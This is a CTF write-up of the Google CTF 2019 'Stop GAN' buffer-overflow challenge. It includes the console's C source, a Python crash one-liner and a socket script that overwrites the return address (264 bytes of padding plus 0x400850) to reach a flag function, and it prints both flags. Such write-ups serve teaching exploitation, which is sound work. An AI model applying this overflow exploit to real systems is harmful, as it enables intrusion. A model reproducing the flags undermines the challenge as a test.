Tags: pwn 

Rating: 0

# Stop GAN (bof) (pwn)

![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-GOOGLE/images/4-0.png)

[Attachment](https://github.com/shawnduong/ctf-writeups/blob/master/2019-GOOGLE/attachments/day4.zip)

Let's go ahead and unzip the challenge and see what we're dealing with.

![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-GOOGLE/images/4-1.png)

Looks like we have two files. One is an ELF executable, which we've dealt with before earlier during this competition, and the other is a C source code file. Let's see what the source code has to say.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/**
* 6e: bufferflow triggering segfault - binary, compile with:
* gcc /tmp/console.c -o /tmp/console -static -s
*
* Console allows the player to get info on the binary.
* Crashing bof will trigger the 1st flag.
* Controlling the buffer overflow in bof will trigger the 2nd flag.
*/

int main() {
setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
char inputs[256];
printf("Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.\n Bonus flag for controlling the crash.\n");
while(1) {
printf("\nConsole commands: \nrun\nquit\n>>");
if (fgets(inputs, 256, stdin) == NULL) {
exit(0);
}
printf("Inputs: %s", inputs);
if ( strncmp(inputs, "run\n\0", 256) == 0 ) {
int result = system("/usr/bin/qemu-mipsel-static ./bof");
continue;
} else if ( strncmp(inputs, "quit\n\0", 256) == 0 ) {
exit(0);
} else {
puts("Unable to determine action from your input");
exit(0);
}
}
return 0;
}
```

## Flag 1: Crashing the Program

The C program simply just runs the executable. The comments give us some direction. If we crash the executable, it will trigger the first flag.

That's easy enough. We can easily generate gargantuan strings using a scripting language such as Python from the command line.

```
$ python2 -c "print 'A'*999"
```

`-c` simply means that we want to pass an instruction or a set of instructions as an argument. `print 'A'*999` is our instruction to the interpreter. This just prints out 999 'A' characters.

However, we can't just simply pipe this into the program. This will crash the C program, not the `bof` program that we're aiming to crash in order to trigger the flag. The C program first takes a command, `run`, and THEN it runs the program, and then we want to enter in our giant input.

What we're essentially doing is we're assuming that the `bof` program will expect an input of a certain length, and we're going to enter an input greater than that length, overflowing the buffer and leading to a segmentation fault (hopefully) crashing the program.

Our input is instead going to be the `run` command, followed by a newline (the equivalent of pressing ENTER), and then our giant input.

```
$ python2 -c "print 'run\n' + 'A'*999"
```

Now let's go ahead and pipe this into a netcat connection with the specified server.

![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-GOOGLE/images/4-2.png)

## Flag

```
CTF{Why_does_cauliflower_threaten_us}
```

## Flag 2: Controlling the Crash

The instructions tell us that we'll receive a bonus flag for controlling the crash. We can control the crash by overwriting the return address in the stack by sliding to it with 264 bytes of data, and then writing an address. We can find the address of a particularly interesting function `local_flag`, when we list functions using `nm` and `grep` it for any function containing the string "flag." Then, we can overwrite the return address with an address inside of that function. After some experimentation, I found 0x400850 to work. This is a Python script I wrote to handle this.

```python
#!/usr/bin/env python3

import socket
import time

def main():

padding = "\x41" * 264
address = "\x50\x08\x40"
payload = padding + address + "\n"

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect(("buffer-overflow.ctfcompetition.com", 1337))
time.sleep(1)
s.recv(1024)
s.send("run\n".encode())
s.send(payload.encode())
time.sleep(1)
print(s.recv(1024).decode("utf-8"))

if __name__ == "__main__":
main()
```

![](https://raw.githubusercontent.com/shawnduong/ctf-writeups/master/2019-GOOGLE/images/4-3.png)

## Flag

```
CTF{controlled_crash_causes_conditional_correspondence}
```

## Next Stop

We've reached the end. Feel free to go all the way back to [Satellite](https://github.com/shawnduong/ctf-writeups/blob/master/2019-GOOGLE/beginners-quest/day1-satellite.md) and check out the other branch.